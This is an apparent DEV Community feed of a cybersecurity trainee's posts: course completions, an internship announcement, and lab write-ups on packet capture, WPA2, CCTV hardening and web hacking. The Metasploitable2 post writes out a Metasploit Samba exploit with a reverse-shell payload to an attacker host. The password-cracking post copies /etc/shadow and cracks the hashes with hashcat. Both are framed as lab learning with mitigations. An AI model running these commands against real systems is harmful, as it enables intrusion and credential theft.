DEV Community: Seif Eldien Ahmad Mohammad

IT Technical Support program at the National Telecommunication Institute (NTI)

Seif Eldien Ahmad Mohammad — Mon, 09 Feb 2026 17:18:24 +0000

I’ve just completed an intensive 120-hour Professional Skills & IT Technical Support program at the National Telecommunication Institute (NTI)

This journey strengthened both my technical foundation and professional skills, with a strong focus on areas directly supporting my path in cybersecurity and red teaming:

Technical & Security Foundations:

Network Protocols & Architecture
Windows Server Installation & Configuration
Network Security Concepts & Threat Recognition
Data Communications & Network Services

Professional & Leadership Skills:

Critical Thinking & Problem Solving
Negotiation & Conflict Resolution
Time Management & Business Writing
Interviewing Skills & CV Preparation

Grateful to the instructors who guided me through this experience. This program added real-world depth to my infrastructure and security knowledge — and I’m excited to keep building toward my future in cybersecurity

Packet-Level Security: How to Monitor and Detect Network Attacks with Nmap and Wireshark

Seif Eldien Ahmad Mohammad — Mon, 13 Oct 2025 17:25:36 +0000

A Step-by-Step Lab for Understanding SYN Scans, Session Flow, and Implementing IDS Logic
Introduction

Network security is fundamentally a battle fought at the packet level. This write-up details a hands-on lab designed to move beyond theory and directly observe the signatures of network activity—both normal and potentially malicious—using powerful tools like Nmap, tcpdump, and Wireshark. Our objective was simple: simulate a basic scan and normal traffic, analyze the results, and lay the groundwork for effective Intrusion Detection System (IDS) rule creation.

Lab Setup and Execution

Our setup involved a Kali Linux machine acting as both the attacker and the monitor, targeting a server at 192.168.1.16.

Execution Steps:

Start Packet Capture (The Monitor): We initiated a raw capture on the monitor interface to ensure we didn't miss a single frame. tcpdump -i wlan0 -w capture.pcap
Run Nmap Scan (The Attack Simulation): A stealthy SYN scan was performed across common ports. The -sS flag sends SYN packets but does not complete the handshake, making it harder to log but easy to detect at the packet level. nmap -sS -p1-1000 -T4 -oN nmap_scan.txt 192.168.1.16
Generate Normal Traffic: To establish a baseline, we generated legitimate web traffic (HTTP/HTTPS) and started an SSH session (ssh user@192.168.1.16).
Testing for Anomalies: Small, repeated requests were sent to generate a pattern that simulates rapid interaction or an aggressive test condition.

Results and PCAP Analysis (Wireshark Deep Dive)

The Nmap results confirmed open ports 22, 80, and 443. However, the real insights came from the capture.pcap file analyzed in Wireshark.

Traffic Type    Wireshark Observation   Security Implication
Nmap Scan    Numerous SYN packets without corresponding ACK flags.  High Confidence Scan: The attacker is probing without completing the TCP handshake, a classic SYN scan.
HTTPS Traffic   TLS Client Hello from 192.168.1.13 to 192.168.1.16. Normal Encrypted Session Start: Expected handshake for secure web traffic.
SSH Session End A RST, ACK flag observed from the server (port 22) to the client port.  Abrupt Connection Close: Indicates the session was forcefully ended (e.g., terminal closed, network error, or firewall reset).
Large Data  Frames of 1460 / 1514 bytes.    Normal Data Flow: Standard large TCP segments (payloads) being transferred.
Test Conditions A few TLS Handshake Failure events. Anomaly: May indicate a configuration error (cipher mismatch) or aggressive testing environment.

Designing a Simple IDS Rule

Based on the SYN scan observation, we can create a foundational rule for an IDS like Suricata or Snort to detect the initial signs of a SYN flood or aggressive port scan:

alert tcp any any -> $HOME_NET any (msg:"Possible Aggressive SYN Scan Detected"; flags:S; threshold:type threshold, track by_src, count 15, seconds 5; sid:1000001; rev:1;)

Interpretation: If any single source IP (track by_src) sends 15 or more SYN packets (flags:S) in a 5-second interval, trigger this alert. This provides immediate, low-false-positive detection for scanning activity.

Mitigation and Defense

Effective network security relies on multiple layers:

IDS/IPS: Deploy Suricata or Snort and constantly tune custom rules.
Segmentation (VLANs): Separate your development/test environment from production networks.
Firewall Hardening: Implement explicit DENY ALL rules, only allowing required ports (22, 80, 443, etc.).
Rate Limiting: Configure firewalls or load balancers to limit the number of new SYN connections per source IP (e.g., using SYN cookies).
Centralized Logging (SIEM): Ship all IDS alerts and system logs to a central location for correlation and long-term analysis.

Conclusion

This lab demonstrated that the true nature of an attack is revealed in the network packets. By understanding TCP/IP flags and protocol sequences, security professionals can write precise detection rules and build robust, proactive defense strategies.

WPA2 Lab Walkthrough — Capture, Analyze, and Harden (Simulated Only)

Seif Eldien Ahmad Mohammad — Fri, 10 Oct 2025 17:28:40 +0000

I ran a simulated WPA2 lab to better understand handshake captures and offline cracking implications. This post summarizes the non-actionable workflow, observations, and hardening guidance.

Summary:

Scope: simulated lab — AP and client under my control.

Objective: capture a WPA2 4-way handshake, analyze it, and test dictionary-based offline recovery to measure passphrase strength.

Observations: short or common passphrases were quickly tested; longer multi-word passphrases offered meaningful resistance.

Recommended hardening: migrate to WPA3 where possible, adopt WPA2/WPA3-Enterprise for organizations, disable WPS, require AES/CCMP, segment networks, and maintain firmware/patch hygiene.

If you want a sanitized checklist or the repository with documentation and screenshot placeholders (no raw captures or keys), reply and I’ll share the repo link.

How I safely tested a TurnKey CCTV appliance (lab workflow + mitigation playbook)

Seif Eldien Ahmad Mohammad — Thu, 09 Oct 2025 22:31:07 +0000

I deployed a TurnKey CCTV appliance in a host-only VM, discovered an outdated SSH banner that mapped to CVE-2024-6387, validated impact using a public PoC in the lab only, and then applied prioritized mitigations: rebuild, patch, SSH hardening, network segmentation, and monitoring. This post gives a practical checklist and a minimal playbook for safe testing and remediation.

Checklist (lab safety first)

Host-only or LAN-segment VM network.

Snapshot the clean image before any tests.

Evidence folder: store nmap outputs, screenshots, and /var/log entries.

Use isolated test files (video samples) rather than production feeds.

Discovery (safe)

Use nmap -sV to detect service banners.

Compare version strings to CVE databases and vendor advisories.

Don’t perform intrusive scans or exploits outside the scoped, authorized lab.

Validation (lab only)

If you find a public PoC, run it only in a disposable, offline VM you control.

Preserve VM snapshots and logs before and after validation.

Do not publish exploit code or step-by-step attack instructions.

Minimal mitigation playbook (immediate priorities)

Rebuild from trusted image and apply all OS/security updates.
SSH hardening (short checklist):

PermitRootLogin no

PasswordAuthentication no (use key auth)

UsePAM yes / AllowUsers / AllowGroups to restrict access

Deploy fail2ban or connection rate limiting

Network segmentation: Put all IoT/CCTV devices on a dedicated VLAN with strict ACLs. Management only via VPN/jump host.
Logging & detection: Ship logs to a central host, enable AIDE, and monitor for suspicious activity.
Credentials & secrets: Rotate secrets, remove default accounts, and use a vault for keys.

Repo & artifacts
I maintain a repo with:

A sanitized incident report template.

Lab setup checklist.

Safe scripts to collect logs and snapshot instructions.
(Repository contains no exploit code — only templates and defensive artifacts.)

Wrap up
When you test IoT/CCTV devices: plan, isolate, snapshot, document, and revert. If you want the checklist or the repo link, send me a DM.

Website Hacking Project: From Exploitation to Mitigation

Seif Eldien Ahmad Mohammad — Thu, 25 Sep 2025 16:33:04 +0000

During my internship, I had the opportunity to work on a Website Hacking Project. The main goal was to understand how attackers exploit vulnerabilities in web applications, but more importantly, how defenders can implement strategies to reduce the risk of these attacks.

This project gave me a hands-on experience that connected both sides of cybersecurity: offense and defense.

Vulnerabilities Explored

🔹 SQL Injection
I practiced injecting malicious SQL queries into input fields to gain unauthorized access to database content. This helped me understand how poor query handling can compromise sensitive information.

🔹 Command Injection
Through command injection, I learned how unvalidated user inputs could be used to execute system-level commands, potentially giving attackers deeper access to the server.

🔹 Login Bypassing
I explored techniques to bypass login forms by exploiting weak authentication mechanisms. This showed how fragile security can be if user validation isn’t properly enforced.

Mitigation Methods Learned

Studying vulnerabilities is only half of the lesson — knowing how to prevent them is equally important.

🛡️ SQL Query Parameters
Using prepared statements and parameterized queries prevents malicious SQL injection attempts by ensuring input is treated as data, not code.

🛡️ Restricting Shell Privileges
By applying the principle of least privilege, even if a shell is compromised, attackers won’t gain full system control.

🛡️ Secure Configurations
Simple misconfigurations can open big doors to attackers. I practiced reviewing configurations to make sure systems are hardened against common attack vectors.

Key Takeaways

Offensive skills help you think like an attacker and anticipate their moves.

Defensive practices ensure you can build resilience against real-world attacks.

Combining both perspectives provides a balanced mindset that is critical in red teaming.

Conclusion

This project was a strong reminder that cybersecurity is not just about finding vulnerabilities, but also about securing systems once the cracks are revealed.

It pushed me to see security as a cycle of continuous learning:
👉 Identify weaknesses
👉 Exploit ethically to understand them
👉 Mitigate to strengthen defenses

I’m excited to carry these lessons forward and continue building skills in both offensive and defensive security.

Hands-On Exploitation with Metasploitable2: From Scanning to Mitigation

Seif Eldien Ahmad Mohammad — Sat, 13 Sep 2025 12:06:29 +0000

Intro
During my second internship project I worked through a practical penetration testing workflow using Kali Linux and Metasploitable2. The goal: practice reconnaissance, exploitation, and writing remediation recommendations. Below I document the steps I followed and the lessons learned.

Environment

Attack box: Kali Linux

Target: Metasploitable2 (VM)

1) Recon & Scanning

I started with broad and focused scans using nmap:
sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x
This revealed a number of services; the ones I focused on were:

21/tcp → vsftpd 2.3.4 (banner only; service was broken/unresponsive)
445/tcp → Samba smbd 3.x 2) Enumeration & Triage

After collecting service/version info I used searchsploit and manual checks:
searchsploit --nmap scans/target.xml searchsploit vsftpd 2.3.4 searchsploit samba 3.0.20
This gave me candidate exploits to test. vsftpd backdoor (CVE-2011-2523) was on the list, as was the Samba username-map script exploit (CVE-2007-2447).
3) Exploitation

vsftpd (CVE-2011-2523): Attempted with Metasploit module exploit/unix/ftp/vsftpd_234_backdoor. The Nmap banner reported vsftpd 2.3.4, but manual connection attempts timed out and the service was not fully responsive—exploit did not yield a session.
Samba (CVE-2007-2447): Used Metasploit: msfconsole use exploit/multi/samba/usermap_script set RHOSTS 192.168.x.x set RPORT 445 set payload cmd/unix/reverse set LHOST <kali-ip> set LPORT 4444 exploit This produced a working remote shell. 4) Post-Exploitation

With an interactive shell I validated privileges:
id uname -a
I documented evidence (screenshots, commands, outputs) and prepared remediation notes.
5) Mitigation Summary:

Continuous vulnerability scanning and asset inventory.
Patch management — update Samba and other services.
Network filtering (block/limit access to ports 445, 21).
Disable unused services and guest/anonymous access.
Apply least privilege on shares and accounts.
Network segmentation and logging/monitoring.
Incident response readiness. Result: Achieved remote shell on Metasploitable2 via Samba exploit, documented findings, and produced a mitigation plan. Practically implementing scanning → exploitation → mitigation reinforced how important remediation and detection are after proving an attack path.

If anyone wants the full notes or the step-by-step commands, I can share the repo with scripts and example outputs.

Password Cracking Project #1 – From Privilege Escalation to Hashcat

Seif Eldien Ahmad Mohammad — Sat, 06 Sep 2025 12:27:28 +0000

🔹 Objective:
Learn and apply the end-to-end process of password cracking on Metasploitable2.

🔹 Steps Taken:
``

1. Dump shadow and passwd files

scp msfadmin@:/etc/passwd ./passwd
scp msfadmin@:/etc/shadow ./shadow

2. Combine them into a hash file

unshadow passwd shadow > combined.txt

3. Run Hashcat against the hashes

hashcat -m 500 -a 0 combined.txt /usr/share/wordlists/rockyou.txt
``
🔹 Outcome:

Extracted hashes successfully.

Attempted cracking with Hashcat.

Root password did not crack with the default wordlist.

🔹 Lessons Learned:

Password cracking requires strong wordlists and sometimes brute-force.

The workflow matters more than the result.

Defenders should always enforce strong passwords and modern hashing algorithms.

💡 Next Steps:

Experiment with custom wordlists.

Try brute-force methods.

Move to the next Red Teaming challenge (DVWA SQL injection).

My Next Step in Cybersecurity: Internship at Young Cyber Knights Foundation

Seif Eldien Ahmad Mohammad — Fri, 05 Sep 2025 13:10:15 +0000

I’m thrilled to share that I’ve been accepted for an internship with Young Cyber Knights Foundation. This opportunity represents an important step in my career path toward becoming a Red Teamer.

Through this internship, I aim to:

Strengthen my penetration testing skills by applying them in real-world scenarios.
Gain practical knowledge in attack simulation techniques and how they are used in red teaming engagements.
Learn effective mitigation strategies to better understand how organizations can defend against these attacks.

This program will not only help me grow technically but also give me a broader perspective on the balance between offense and defense in cybersecurity. I believe this dual perspective is essential for anyone pursuing a career in offensive security.

I’m grateful for this chance to learn, improve, and contribute to the cybersecurity community. Looking forward to what’s next!

I’m glad to share that I have successfully completed the main technical track of the Cybersecurity Academy scholarship

Seif Eldien Ahmad Mohammad — Tue, 26 Aug 2025 20:34:31 +0000

Today I’m glad to share that I have successfully completed the main technical track of the Cybersecurity Academy scholarship offered by the National Telecommunication Institute (NTI) National Telecommunication Institute - المعهد القومي للاتصالات

Throughout this journey, I was introduced to and practiced several essential areas in cybersecurity, including:

Network & Network Security
Introduction to Cybersecurity Threats (including NIST Cybersecurity Framework)
Vulnerability Assessment (categorization, methodologies, Nessus & OpenVAS)
Web Application Vulnerability Scanning (OWASP Top 10, OWASP ZAP, Burp Suite)
WordPress Security Hardening (Linux basics, architecture, vulnerabilities, mitigations, brute force attacks)
Basic Penetration Testing Concepts
Cloud Security Auditing (fundamentals, threat analysis, tools such as ScoutSuite & Prowler, and hands-on auditing)
Log Analysis & Threat Hunting
Cybersecurity Awareness Campaigns

This program gave me solid foundational knowledge in both defensive and offensive security aspects, and I’m really grateful for the opportunity to learn and practice these skills.

📌 There are still two upcoming sessions focusing on freelancing opportunities in the cybersecurity field, which I’m excited to attend.

Looking forward to applying what I’ve learned in real-world scenarios and continuing my journey towards becoming a Red Teamer.

Python Essentials 1 – Completed! 🐍✨

Seif Eldien Ahmad Mohammad — Thu, 07 Aug 2025 22:55:12 +0000

Just wrapped up Python Essentials 1 via Cisco Networking Academy — and wow, what a ride!

No prior coding experience? Same here — this course took me from zero to confidently writing, debugging, and executing Python scripts. Learned how to think algorithmically, tackle problems logically, and follow best practices for clean code.

Next step: pursuing the PCEP certification. Feeling inspired and ready to dive deeper into software dev, data analysis, and automation. Let’s code and grow together!

🚀 Learning Update: Bash, Python, and Cybersecurity Training!

Seif Eldien Ahmad Mohammad — Mon, 04 Aug 2025 16:21:53 +0000

Hello everyone! 👋
Just wanted to share some quick updates from my learning journey:

✅ I’ve reached the for & while loops section in Python – still basic but getting stronger every day.
🖥️ Practicing Linux sysadmin on my personal machine:
- Backup automation
- Network monitoring scripts
- All pushed to GitHub right here 👇 My BashScripts Repo

💥 Bonus: Tomorrow I’m kicking off a new cybersecurity training program from Egypt’s Ministry of Communications – excited to dive deeper into real-world cyber skills!

📌 SEO-friendly Tags:

Seif Eldien Ahmad Mohammad, Seif Eldein, Cybersecurity Trainee, Python Beginner, Linux Admin Scripts, Red Team Egypt

Thanks for reading! Feel free to connect or share your current projects.

🧠 My Personal Bash Scripts Repository on GitHub

Seif Eldien Ahmad Mohammad — Wed, 30 Jul 2025 22:24:22 +0000

Hey Devs! 👋

I've created a GitHub repo that includes all the Bash scripts I’m using and learning from during my Linux administration and cybersecurity training.

🔗 Repo Link: github.com/SeifEldienAhmad/BashScripts

✅ What’s inside?

Update automation scripts
Backup utilities
User and permission management
Aliases and shortcuts
Scripts that I personally use and test

💡 Feel free to clone, fork, or contribute if you'd like!

🔄 I'll be adding more as I go through RHSA and my Red Team learning roadmap.

🟢 👉 Ready to explore? Check out the repo now »

Author: Seif Eldien Ahmad Mohammad

Other name variations I go by (for SEO and clarity):

SeifEldien, Seif Eldein, Seif Eldien, Seif Ahmad

✅ Official GitHub & tech content published under:

Seif Eldien Ahmad Mohammad